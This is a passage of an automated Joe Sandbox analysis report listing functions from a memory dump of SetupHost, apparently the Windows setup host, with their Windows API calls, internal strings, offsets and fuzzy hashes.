                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: memset$PrintRaiseStatus
                                                                                                                        • String ID: $,$-$CRtlGrowingList<struct _XMLDOC_ATTRIBUTE,50,6>::Initialize$CXmlLogicalState::Initialize$RtlInitializeGrowingList( this, sizeof(TStoredObject), m_ulElementsPerChunk, (PVOID)m_InternalBuffer, sizeof(m_InternalBuffer), Allocator )$RtlXmlInitializeNextLogicalThing(this, &Init)$onecore\base\xml\udom_xmlwalker.h
                                                                                                                        • API String ID: 3387324805-1134685988
                                                                                                                        • Opcode ID: f28b317d4d5e83af8a87d9d913924b273577adeb89eacffed2b961a5bb0b8765
                                                                                                                        • Instruction ID: 763d8b42d9f8e7e1605bd4749b152dc3905ebbb0c0e8498171526044ee2affea
                                                                                                                        • Opcode Fuzzy Hash: f28b317d4d5e83af8a87d9d913924b273577adeb89eacffed2b961a5bb0b8765
                                                                                                                        • Instruction Fuzzy Hash: 1B31A4B6901709AAEB12DFA4D848FDEBFF5BF80314F10891AE425A7341DB749648CB61
                                                                                                                        Function 004E217C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 183stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004E2639: strchr.MSVCRT ref: 004E2658
                                                                                                                        • strrchr.MSVCRT ref: 004E22AC
                                                                                                                        • _set_errno.MSVCRT ref: 004E22C3
                                                                                                                        • strtol.MSVCRT ref: 004E22D0
                                                                                                                        • _errno.MSVCRT ref: 004E22F1
                                                                                                                        • strncpy_s.MSVCRT ref: 004E224A
                                                                                                                          • Part of subcall function 0054ED1E: __EH_prolog3_catch.LIBCMT ref: 0054ED25
                                                                                                                        • strncpy_s.MSVCRT ref: 004E2376
                                                                                                                          • Part of subcall function 004E1EE1: UuidCreate.RPCRT4(?), ref: 004E1F0C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: strncpy_s$CreateH_prolog3_catchUuid_errno_set_errnostrchrstrrchrstrtol
                                                                                                                        • String ID: !
                                                                                                                        • API String ID: 2476975350-2657877971
                                                                                                                        • Opcode ID: ef97e91609261530a8c4af9bf65f05c5cc508739d69d36e057718c9e3b9f437e
                                                                                                                        • Instruction ID: ee295d53ba8ec44b1290cc29f3c1ae9c0113e84d3276dcc89969f8f6091d1b54
                                                                                                                        • Opcode Fuzzy Hash: ef97e91609261530a8c4af9bf65f05c5cc508739d69d36e057718c9e3b9f437e
                                                                                                                        • Instruction Fuzzy Hash: 59517E719083819BD7148B769955BABBBEDBF45302F24849FE882C7381DE7C94408B38
                                                                                                                        Function 005272D8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133memoryfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 005254A3: EnterCriticalSection.KERNEL32(00000000,005524A8,00000030,0051DF5C,00000000,00000000,00000000,?,00000000,00000000,0051E358,?,?,00000000), ref: 005254EA
                                                                                                                          • Part of subcall function 005254A3: GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000000,0051E358,?,?,00000000), ref: 00525516
                                                                                                                          • Part of subcall function 005254A3: HeapFree.KERNEL32(00000000,?,00000000,00000000,0051E358,?,?,00000000), ref: 0052551D
                                                                                                                        • CreateFileW.KERNEL32(00000000,C0010000,00000007,00000000,00000002,48000100,00000000), ref: 00527349
                                                                                                                          • Part of subcall function 005213ED: RtlNtStatusToDosError.NTDLL ref: 005214EF
                                                                                                                          • Part of subcall function 005213ED: RtlNtStatusToDosError.NTDLL ref: 005214FD
                                                                                                                          • Part of subcall function 005213ED: SetLastError.KERNEL32(00000000), ref: 00521519
                                                                                                                        • GetLastError.KERNEL32 ref: 005273F0
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 0052740D
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00527414
                                                                                                                        • SetLastError.KERNEL32(?,00000000), ref: 00527422
                                                                                                                        Strings
                                                                                                                        • Failed to get img event, xrefs: 005273DF
                                                                                                                        • CompressFileBackedByWim, xrefs: 005273D5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Error$Heap$Last$FreeProcessStatus$CreateCriticalEnterFileSection
                                                                                                                        • String ID: CompressFileBackedByWim$Failed to get img event
                                                                                                                        • API String ID: 3974560987-1264866896
                                                                                                                        • Opcode ID: 05dc67bb4c45ac3ee0ec643e58391d3f6b52f291cc354cba7f887f4b312bfa56
                                                                                                                        • Instruction ID: 9ce56625c946c8cade6fbef2429a0bc7ea530d8b1f3a8b51393f77aecf764d84
                                                                                                                        • Opcode Fuzzy Hash: 05dc67bb4c45ac3ee0ec643e58391d3f6b52f291cc354cba7f887f4b312bfa56
                                                                                                                        • Instruction Fuzzy Hash: 36415771E04229AFDB10DFA9E885A9EBFF8BF5D710F144525F905E7290D770AC018BA0
                                                                                                                        Function 0054A452 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 98registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004FE595: _vsnwprintf.MSVCRT ref: 004FE5C7
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,000F003F,?,?,?,?,00000001,00000000,00000000), ref: 0054A4C8
                                                                                                                        • RegDeleteTreeW.ADVAPI32(?,QueryParameters,?,?,?,00000001,00000000,00000000), ref: 0054A4F0
                                                                                                                        • RegCreateKeyExW.ADVAPI32(?,QueryParameters,00000000,00000000,00000000,000F003F,00000000,?,00000000,?,?,?,00000001,00000000,00000000), ref: 0054A521
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000), ref: 0054A56B
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000), ref: 0054A57F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$CreateDeleteOpenTree_vsnwprintf
                                                                                                                        • String ID: %ls\%ls\%ls$QueryParameters
                                                                                                                        • API String ID: 281199228-3368011194
                                                                                                                        • Opcode ID: 4fe708781e14870525f4bff83593a98ee049194bb52821fdb4b0b49a6fd26c90
                                                                                                                        • Instruction ID: 6506e3de0e1bae9fd6328e193b6eeef311526cc1f5273bd9904765c1f41cdb64
                                                                                                                        • Opcode Fuzzy Hash: 4fe708781e14870525f4bff83593a98ee049194bb52821fdb4b0b49a6fd26c90
                                                                                                                        • Instruction Fuzzy Hash: 1A31E673D8123EABCF21DB54CC89AEAFBB8FB14315F0101A6A919A7151D7709E40DBE1
                                                                                                                        Function 0054C10A Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 181memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _wcsicmp.MSVCRT ref: 0054C290
                                                                                                                        • _wcsicmp.MSVCRT ref: 0054C2AA
                                                                                                                          • Part of subcall function 0054BB7D: GetProcessHeap.KERNEL32(00000000,00000010,00000000,00000000,?,0054C1A2,?,?,00000000,?,?,?,?,?,0054C0AE,00000000), ref: 0054BB8B
                                                                                                                          • Part of subcall function 0054BB7D: HeapAlloc.KERNEL32(00000000,?,?,?,?,0054C0AE,00000000,00000000,?,00000000,00000000,00000000,00000001,00000001,00000000,00000000), ref: 0054BB92
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00549637,00000000,?,?,00000000), ref: 0054C331
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00549637,00000000,?,?,00000000), ref: 0054C338
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process_wcsicmp$AllocFree
                                                                                                                        • String ID: false$null$true
                                                                                                                        • API String ID: 2655604116-2913297407
                                                                                                                        • Opcode ID: 064fa0dba3de7e90fd399813a0643eef738a119a072554bfb36971fa93d79ddc
                                                                                                                        • Instruction ID: 348d7962547c7adb156d885bcc914bc723c1194de0767c1d51b678a53d53284b
                                                                                                                        • Opcode Fuzzy Hash: 064fa0dba3de7e90fd399813a0643eef738a119a072554bfb36971fa93d79ddc
                                                                                                                        • Instruction Fuzzy Hash: 785123329093128BCB60EF64D4585AFBFE4BFC8728F10892EF885D7250EB70D9048796
                                                                                                                        Function 0053D2D1 Relevance: 12.2, APIs: 8, Instructions: 155memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000400,00000000,005268B9,00000000,00000000,00000000,?,0053D25E,00000000,00000000,?,?,005267CE,?,?), ref: 0053D2E8
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,0053D25E,00000000,00000000,?,?,005267CE,?,?,?), ref: 0053D2EF
                                                                                                                        • DeviceIoControl.KERNEL32(00000000,00090310,00000000,00000000,00000000,00000400,00000000,00000000), ref: 0053D310
                                                                                                                        • GetLastError.KERNEL32(?,0053D25E,00000000,00000000,?,?,005267CE,?,?,?), ref: 0053D31A
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,0053D25E,00000000,00000000,?,?,005267CE,?,?,?), ref: 0053D337
                                                                                                                        • HeapFree.KERNEL32(00000000,?,0053D25E,00000000,00000000,?,?,005267CE,?,?,?), ref: 0053D33E
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,0053D25E,00000000,00000000,?,?,005267CE,?,?,?), ref: 0053D453
                                                                                                                        • HeapFree.KERNEL32(00000000,?,0053D25E,00000000,00000000,?,?,005267CE,?,?,?), ref: 0053D45A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$Free$AllocControlDeviceErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1143500657-0
                                                                                                                        • Opcode ID: 432127ac4592348846ffb07003f9e8947d0163a54e4e62a4ec5c2fdedce273d0
                                                                                                                        • Instruction ID: 88afe977d958392ea80e1bb758f50e8051bec615b02169832034ae81d9b82355
                                                                                                                        • Opcode Fuzzy Hash: 432127ac4592348846ffb07003f9e8947d0163a54e4e62a4ec5c2fdedce273d0
                                                                                                                        • Instruction Fuzzy Hash: D0519A75604305DFDF288F68E849B76BFB9FB55711F148469E8058B251E2B1EC80CBA2
                                                                                                                        Function 004FA1E1 Relevance: 12.1, APIs: 8, Instructions: 119memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 004FA259
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?), ref: 004FA260
                                                                                                                        • memcpy.MSVCRT(00000000,?,?,?,?,?), ref: 004FA285
                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 004FA2AE
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 004FA2D6
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?), ref: 004FA2DD
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?), ref: 004FA308
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?), ref: 004FA30F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeProcess$AllocLibrarymemcpy
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2631027701-0
                                                                                                                        • Opcode ID: 7d13b432ffe6f0ba3649bc7b0bd02882b5d6ca7e55c9c911b51fe507de6aee1b
                                                                                                                        • Instruction ID: bafd3e3a8aba7cf87d977e5416d00a0f874513ab652f5761d2d1b89d214b7647
                                                                                                                        • Opcode Fuzzy Hash: 7d13b432ffe6f0ba3649bc7b0bd02882b5d6ca7e55c9c911b51fe507de6aee1b
                                                                                                                        • Instruction Fuzzy Hash: 0F41E4B5E0020EABCB019FA5C88467EF7B4BF98301F1180AAE619D3340C7399915CB56
                                                                                                                        Function 00520278 Relevance: 12.1, APIs: 8, Instructions: 56memorysynchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000008,?,?,00000000,0052D737,?,?,00000000,?,?,0052D6AA,?,0052D0B0,0052CFA0,Function_0006CEF0), ref: 00520285
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,0052D6AA,?,0052D0B0,0052CFA0,Function_0006CEF0,00000000,00000000,?,00526A3B,?,?,?,?,00000000), ref: 0052028C
                                                                                                                        • GetLastError.KERNEL32(?,0052D6AA,?,0052D0B0,0052CFA0,Function_0006CEF0,00000000,00000000,?,00526A3B,?,?,?,?,00000000,00000000), ref: 00520298
                                                                                                                        • GetLastError.KERNEL32(?,0052D6AA,?,0052D0B0,0052CFA0,Function_0006CEF0,00000000,00000000,?,00526A3B,?,?,?,?,00000000,00000000), ref: 005202B0
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,0052D6AA,?,0052D0B0,0052CFA0,Function_0006CEF0,00000000,00000000,?,00526A3B,?,?,?,?), ref: 005202D9
                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,0052D6AA,?,0052D0B0,0052CFA0,Function_0006CEF0,00000000,00000000,?,00526A3B,?,?,?,?,00000000), ref: 005202E3
                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,0052D6AA,?,0052D0B0,0052CFA0,Function_0006CEF0,00000000,00000000,?,00526A3B,?,?,?,?,00000000), ref: 005202F3
                                                                                                                        • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,0052D6AA,?,0052D0B0,0052CFA0,Function_0006CEF0,00000000,00000000,?,00526A3B,?), ref: 00520306
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalErrorHeapLastSection$AllocEnterLeaveObjectProcessReleaseSemaphoreSingleWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 549668083-0
                                                                                                                        • Opcode ID: cce4965f75327a422c7eb816d1ed55aabf3cf9affaf240c92e7f4ed4e0fd96d2
                                                                                                                        • Instruction ID: 92f0fe0e764e8ff223844a29e16107a95d56bea09fd270a9a664e4b301889d19
                                                                                                                        • Opcode Fuzzy Hash: cce4965f75327a422c7eb816d1ed55aabf3cf9affaf240c92e7f4ed4e0fd96d2
                                                                                                                        • Instruction Fuzzy Hash: 8E11C279216321DBDB119F64FC4CB667EA4FF69312F118055F905DA1E6C770C844DB60
                                                                                                                        Function 0052106C Relevance: 10.6, APIs: 7, Instructions: 140COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetLastError.KERNEL32(000000DF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00521284), ref: 0052109A
                                                                                                                        • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,00000000,?), ref: 005210E6
                                                                                                                        • DeviceIoControl.KERNEL32(?,000980C8,?,00000010,00000000,00000000,?,00521284), ref: 00521140
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00521284,?), ref: 0052114C
                                                                                                                        • GetOverlappedResult.KERNEL32(?,00521284,?,00000001), ref: 00521165
                                                                                                                        • SetFileInformationByHandle.KERNEL32(?,00000006,?,00000008), ref: 00521195
                                                                                                                        • SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001), ref: 005211AC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$ErrorLastPointer$ControlDeviceHandleInformationOverlappedResult
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3873607931-0
                                                                                                                        • Opcode ID: d99a4ecd6b43dbd878020a5aa9b71716e823eb4a5058657ea9c6ec6fb10e3d74
                                                                                                                        • Instruction ID: 91662351747d9bac21050c30e573da794a1feef4ef5e55a7b01e4e30aff9fc87
                                                                                                                        • Opcode Fuzzy Hash: d99a4ecd6b43dbd878020a5aa9b71716e823eb4a5058657ea9c6ec6fb10e3d74
                                                                                                                        • Instruction Fuzzy Hash: 9A415C71A01619ABDB10CF64EC85BAFBBF9FFA9710F114429E905E7280DB70AD40CB64
                                                                                                                        Function 00523188 Relevance: 10.6, APIs: 7, Instructions: 126memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 005255C6: CreateFileW.KERNEL32(00000000,C0000000,00000007,00000000,00000002,-080000FF,00000000,?,00000008,00000000,00528CDB,00528CDB,?,005289FD,00000000), ref: 00525625
                                                                                                                          • Part of subcall function 0052A4C7: GetProcessHeap.KERNEL32(00000000,00000002,00000000,00000000,00000000,00000000,?,00000000,?,?,0051DD7D,?,00000000,00000000,00000000), ref: 0052A51A
                                                                                                                          • Part of subcall function 0052A4C7: HeapAlloc.KERNEL32(00000000,?,?,0051DD7D,?,00000000,00000000,00000000,?,0051E028,?,00000000), ref: 0052A521
                                                                                                                          • Part of subcall function 0052A4C7: SetLastError.KERNEL32(00000000,000001D6,80070216,00000000,00000000,00000000,00000000,?,00000000,?,?,0051DD7D,?,00000000,00000000,00000000), ref: 0052A5BE
                                                                                                                        • GetFileSizeEx.KERNEL32(00000000,?,?,?,00000000,00000000,?,00000000,?,?,0051DD7D,?,00000000,00000000,00000000), ref: 0052321A
                                                                                                                          • Part of subcall function 00526824: memset.MSVCRT ref: 00526875
                                                                                                                          • Part of subcall function 00526824: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0052691F
                                                                                                                        • GetLastError.KERNEL32(00000000,00000002,?,00000000,?,?,-00000030,?,?,?,?,?,?,?,00000000,00000000), ref: 0052326E
                                                                                                                          • Part of subcall function 00521984: SetLastError.KERNEL32(00000006,00000000,0051E32B,?,00000000), ref: 005219AC
                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,00000000,?,?,0051DD7D,?,00000000,00000000,00000000,?,0051E028,?,00000000), ref: 005232AC
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,0051DD7D,?,00000000,00000000,00000000,?,0051E028,?,00000000), ref: 005232B7
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,0051DD7D,?,00000000), ref: 005232C8
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,0051DD7D,?,00000000), ref: 005232CF
                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,0051DD7D,?,00000000), ref: 005232DA
                                                                                                                          • Part of subcall function 0052A5C8: GetProcessHeap.KERNEL32(00000000,00000000,?,00523202,?,?,00000000,00000000,?,00000000,?,?,0051DD7D,?,00000000,00000000), ref: 0052A62E
                                                                                                                          • Part of subcall function 0052A5C8: HeapFree.KERNEL32(00000000,?,00523202,?,?,00000000,00000000,?,00000000,?,?,0051DD7D,?,00000000,00000000,00000000), ref: 0052A635
                                                                                                                          • Part of subcall function 0052A5C8: SetLastError.KERNEL32(00000000,?,00523202,?,?,00000000,00000000,?,00000000,?,?,0051DD7D,?,00000000,00000000,00000000), ref: 0052A640
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$Heap$Process$FileFree$AllocCloseCreateHandleSizememset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 383526647-0
                                                                                                                        • Opcode ID: 66a4aee930ef573c7c0555ada56ccc1e0a80d431840989441658b239e4bca023
                                                                                                                        • Instruction ID: 3973cc148c02dfac75a250b1deef52db03c394c194ea9019e589804a0f06321b
                                                                                                                        • Opcode Fuzzy Hash: 66a4aee930ef573c7c0555ada56ccc1e0a80d431840989441658b239e4bca023
                                                                                                                        • Instruction Fuzzy Hash: C2410735B00726ABDB14ABB4A85EA7FBEB6BFD6311F004428F502932D1DF348E06C654
                                                                                                                        Function 00507201 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 80memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000020,00000000,00000000,00000000,00000004,00000014,00000000,00000000,0051E93C,?,?,00000000,00000000), ref: 0050726F
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0051F26B), ref: 00507276
                                                                                                                          • Part of subcall function 00507DD3: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00507358,00000000), ref: 00507E22
                                                                                                                          • Part of subcall function 00507DD3: HeapFree.KERNEL32(00000000,?,?,00507358,00000000), ref: 00507E29
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocFree
                                                                                                                        • String ID: NewContext.Allocate()$Not-null check failed: UpdateContext$SourceMicrodom != 0$Windows::uDom::Rtl::RtlCreateMicrodomUpdateContext$onecore\base\xml\udom_modify.cpp
                                                                                                                        • API String ID: 756756679-3807835623
                                                                                                                        • Opcode ID: c980b30da4676c84dab726089bdb727342ecb908b5a191072e0c6480edb1acb2
                                                                                                                        • Instruction ID: 1ca78617d5c7a4418afa724af76a8df75dce46091b0a1ee048b526e9cf9afceb
                                                                                                                        • Opcode Fuzzy Hash: c980b30da4676c84dab726089bdb727342ecb908b5a191072e0c6480edb1acb2
                                                                                                                        • Instruction Fuzzy Hash: E821CEB590C7169BC320DF58A40865FBFE4BBD8710F11492EF85987391D774DA088BA6
                                                                                                                        Function 00520312 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00520329
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0052034A
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00520362
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00520369
                                                                                                                        • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 005203AB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
